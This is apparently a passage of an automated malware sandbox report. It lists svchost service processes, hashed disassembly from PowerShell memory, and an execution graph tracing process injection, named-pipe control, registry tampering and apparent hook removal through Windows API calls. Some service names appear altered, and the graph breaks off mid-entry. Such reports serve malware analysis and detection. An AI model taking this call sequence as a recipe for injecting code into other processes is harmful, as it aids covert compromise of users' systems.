                                                        Start time:08:08:42
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:47
                                                        Start time:08:08:42
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeusererSvc
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:48
                                                        Start time:08:08:42
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:49
                                                        Start time:08:08:43
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:50
                                                        Start time:08:08:43
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:51
                                                        Start time:08:08:44
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:52
                                                        Start time:08:08:45
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:53
                                                        Start time:08:08:45
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:54
                                                        Start time:08:08:45
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:55
                                                        Start time:08:08:46
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispusererDesktopSvc
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:56
                                                        Start time:08:08:46
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:57
                                                        Start time:08:08:46
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:58
                                                        Start time:08:08:47
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:59
                                                        Start time:08:08:47
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FF7C0FA16AE Relevance: .5, Instructions: 540COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1705137085.00007FF7C0FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff7c0fa0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0db361fbb4ce5336476285640fa26c03cdb8f8705dd7ec14573dafb1c367e8ec
                                                          • Instruction ID: 8df251f0af67a64500a40c7a9ce2082942996e35ee1671d88ae7362bc3308d36
                                                          • Opcode Fuzzy Hash: 0db361fbb4ce5336476285640fa26c03cdb8f8705dd7ec14573dafb1c367e8ec
                                                          • Instruction Fuzzy Hash: 9FF13921A0DBCA0FE35AAB3858552B5BBE1FF46760F4901FAD049C72D3DA187C55C3A1
                                                          Function 00007FF7C0FA1834 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1705137085.00007FF7C0FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff7c0fa0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99f08c5d2b57945593859c99e68803693c6a966b82b810010c0547446bb44489
                                                          • Instruction ID: 5773fa1fef01c11da0cb9f35bd4c1736ef90ea23ab19e6da817e0377b0723b60
                                                          • Opcode Fuzzy Hash: 99f08c5d2b57945593859c99e68803693c6a966b82b810010c0547446bb44489
                                                          • Instruction Fuzzy Hash: 57210931E1DA8A4FE399AA285845178A3D2FF44B71BCA11B9D00DC7293DE1CBC958391
                                                          Function 00007FF7C0ED37B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1704451305.00007FF7C0ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff7c0ed0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction ID: cd5c8ce7d142fcd7fb302d749365b01c5ceba70e1359d7d41e4de6ca65a9a2ba
                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction Fuzzy Hash: F401A77010CB0C4FD744EF0CE451AA6B3E0FB85364F50052EE58AC3651D732E882CB41

                                                          Executed Functions

                                                          Function 00007FF7C0F86605 Relevance: .4, Instructions: 432COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418652056.00007FF7C0F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0f80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a2174d1b9e84f52d586b138654d9975c20141981d1f66b16db25d4cd6ff7f3f
                                                          • Instruction ID: ebd7cd8972f5a89f7931b08095adb1998f6ea3c2320e49c1079da060dbad013b
                                                          • Opcode Fuzzy Hash: 9a2174d1b9e84f52d586b138654d9975c20141981d1f66b16db25d4cd6ff7f3f
                                                          • Instruction Fuzzy Hash: 29D13731A0DA895FE796AF2848155B9BBE5FF06324B4402FED44DC7293DB28B845C3A1
                                                          Function 00007FF7C0EB94FA Relevance: .3, Instructions: 338COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8bcf72e8b71d4b4c2fc1347f3f168e1114fede0298d1e4aa34857ada38dfa84
                                                          • Instruction ID: fdd297848a7e7f978693cd93c58de8482555b65d193100072164c3b40b18dae7
                                                          • Opcode Fuzzy Hash: c8bcf72e8b71d4b4c2fc1347f3f168e1114fede0298d1e4aa34857ada38dfa84
                                                          • Instruction Fuzzy Hash: 5AB11C72D4DBC14FE706BB685C592A8BFA0FF52324F4841BBC489C7293EA15781583E6
                                                          Function 00007FF7C0EB9694 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 536654f23bc414283adc454155a34d8ae39702eba638f4810df110b00c2fdce3
                                                          • Instruction ID: bbc97572d37b62f7166b5eb79725e6f318bdf220f2f994aa93bb1a84d1686003
                                                          • Opcode Fuzzy Hash: 536654f23bc414283adc454155a34d8ae39702eba638f4810df110b00c2fdce3
                                                          • Instruction Fuzzy Hash: 6B512672D0DA848FD709AF685C1A2A8BFE0FF56321F4401BFD489C7293DA25B81587D6
                                                          Function 00007FF7C0EB96AA Relevance: .2, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5acd884f216da7bd3a00a5a68ec6ce73425b9d22b338f20b47a1cd61708ce3df
                                                          • Instruction ID: dfd2cbd20235f2a29a5233eba3b0be7abad92a3aaa4d983e09163fdeba485977
                                                          • Opcode Fuzzy Hash: 5acd884f216da7bd3a00a5a68ec6ce73425b9d22b338f20b47a1cd61708ce3df
                                                          • Instruction Fuzzy Hash: 66512872D0DA848FD709AF685C4A2A8BFE0FF56321F4441AFD48983293DA24B81587D6
                                                          Function 00007FF7C0EB9708 Relevance: .2, Instructions: 164COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97fb7a50133d62b0fd677456dc8c4007559b1bdfaa1ce0538be5fc26a37910d1
                                                          • Instruction ID: c22bae08bcdf5e7d433f22c8f93621cf5c34783ffa3ce470e2f689217aa2eb92
                                                          • Opcode Fuzzy Hash: 97fb7a50133d62b0fd677456dc8c4007559b1bdfaa1ce0538be5fc26a37910d1
                                                          • Instruction Fuzzy Hash: CE512772D1CA888FDB09AB5C9C4A2A8BFE0FF55320F44416FD48983293DA24A815C7C6
                                                          Function 00007FF7C0F84370 Relevance: .1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418652056.00007FF7C0F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0f80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 374c3a8f02f9fc4c72cf249a38eebda5736f938f3decdf6d8feb0bd99ee6ab18
                                                          • Instruction ID: 3a2996b33eda0b6a5f5c78b6226688754f1b11c0273e0ea49a0449924516a9bd
                                                          • Opcode Fuzzy Hash: 374c3a8f02f9fc4c72cf249a38eebda5736f938f3decdf6d8feb0bd99ee6ab18
                                                          • Instruction Fuzzy Hash: 3B411D32E0DA454FE7A9EF2C54556F4B7D1EF46730B8802BAC48DD7283EA14BC518391
                                                          Function 00007FF7C0D9EC60 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1417543112.00007FF7C0D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0d9d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b87195f51faebd199eea265873f50069b3cd0ff043a678e3ebf214905bc3ae16
                                                          • Instruction ID: 120316980ab0f3ce8f7416f60f68ffc0efe98693d32b5cf5ef4cb120653aa823
                                                          • Opcode Fuzzy Hash: b87195f51faebd199eea265873f50069b3cd0ff043a678e3ebf214905bc3ae16
                                                          • Instruction Fuzzy Hash: 0641067040DBC45FE7569B29D841A527FF0FF56320B1506EFD088CB1A3D725A846CBA2
                                                          Function 00007FF7C0EBA4AC Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8989cae2f106e05993bc1ec7fa02a1a49ef8c4a2b31f26a8ec67506150d6ed4a
                                                          • Instruction ID: 0f81738ef5d543e4c030ea99275ca01c13cd6e852fb7287a44e7fadb48260be7
                                                          • Opcode Fuzzy Hash: 8989cae2f106e05993bc1ec7fa02a1a49ef8c4a2b31f26a8ec67506150d6ed4a
                                                          • Instruction Fuzzy Hash: 1B21E93190C74C4FEB59EF6C984A7E9BBE0EB96331F04426BD449C3152D674A416C792
                                                          Function 00007FF7C0F843BC Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418652056.00007FF7C0F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0f80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a7f33c72438908acc4f8b6126e1b7c60ed96111ed3c88351c877eac72e76e50
                                                          • Instruction ID: bfa5c037b48892580348919ea90ce8758d7631fa96998a0b90f624f3b82aef91
                                                          • Opcode Fuzzy Hash: 4a7f33c72438908acc4f8b6126e1b7c60ed96111ed3c88351c877eac72e76e50
                                                          • Instruction Fuzzy Hash: 7B110632D0D5854FE7A5EF2894546F8B7D1FF42730B8902BAD48DE7682DB18BC8093A1
                                                          Function 00007FF7C0EB33B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                          • Instruction ID: 88b0ce6ba2638357551e2bc8aa35d402578f623fbdffb9fdec422c5817276205
                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                          • Instruction Fuzzy Hash: 7201A77010CB0C4FD744EF0CE451AA6B3E0FB85364F50052DE58AC3651DB32E882CB45
                                                          Function 00007FF7C0F8413E Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418652056.00007FF7C0F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0f80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a55db3824952b8e3c6c5dca34cd497fd0176b93f91e8463410ca687d5e496bed
                                                          • Instruction ID: 5c0bcd14c3479ba9156299ec58189afa76f5de9c0d494b9ffc9f66d64158228a
                                                          • Opcode Fuzzy Hash: a55db3824952b8e3c6c5dca34cd497fd0176b93f91e8463410ca687d5e496bed
                                                          • Instruction Fuzzy Hash: 90F0F432A0C9848FD39AEE1C98154E4B7E1EF5632075501F6D08DCB263CA25BC85C791
                                                          Function 00007FF7C0EB9CF8 Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 945f09b3fb441e36a09808d6701811c080e8e9445669c147c7b812da6f360ee5
                                                          • Instruction ID: e48b3c00d905a22fa2f87235bdda6175fe985813ce3c2458636d2665d8ab4da4
                                                          • Opcode Fuzzy Hash: 945f09b3fb441e36a09808d6701811c080e8e9445669c147c7b812da6f360ee5
                                                          • Instruction Fuzzy Hash: 78F02B318486894FDB46EF2888194D5BFE0EF16210F040297D848C71A2DB64A458C7D2
                                                          Function 00007FF7C0F841D1 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418652056.00007FF7C0F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0f80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                          • Instruction ID: 08663c9118e443d9cee12d0b92dbccfbe832cd7a8e853765646e0926aa4c7a5c
                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                          • Instruction Fuzzy Hash: F2E0ED3170C8048F9669EA0CE0449E9B3E1EB9933175102A6D14ED7661C721FC918B90

                                                          Non-executed Functions

                                                          Function 00007FF7C0EB8BD3 Relevance: 7.6, Strings: 6, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1418189062.00007FF7C0EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff7c0eb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N_^?$N_^@$N_^K$N_^N$N_^T$N_^Y
                                                          • API String ID: 0-2010414532
                                                          • Opcode ID: e4015915a2bb8115bb20bd512c87dfd308f5b6b06e82c39ef37751cd1ed47a63
                                                          • Instruction ID: 7637a5e55aa64f2e24463cd9d7e35f5259c51a17898fc0207903f5f4edb9c054
                                                          • Opcode Fuzzy Hash: e4015915a2bb8115bb20bd512c87dfd308f5b6b06e82c39ef37751cd1ed47a63
                                                          • Instruction Fuzzy Hash: D721F667B0C8260B930136BEBC596E8AB40DFD83B574442B2D758CF653DE14B48787D6

                                                          Execution Graph

                                                          Execution Coverage:47.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:67.3%
                                                          Total number of Nodes:226
                                                          Total number of Limit Nodes:23
                                                          execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd 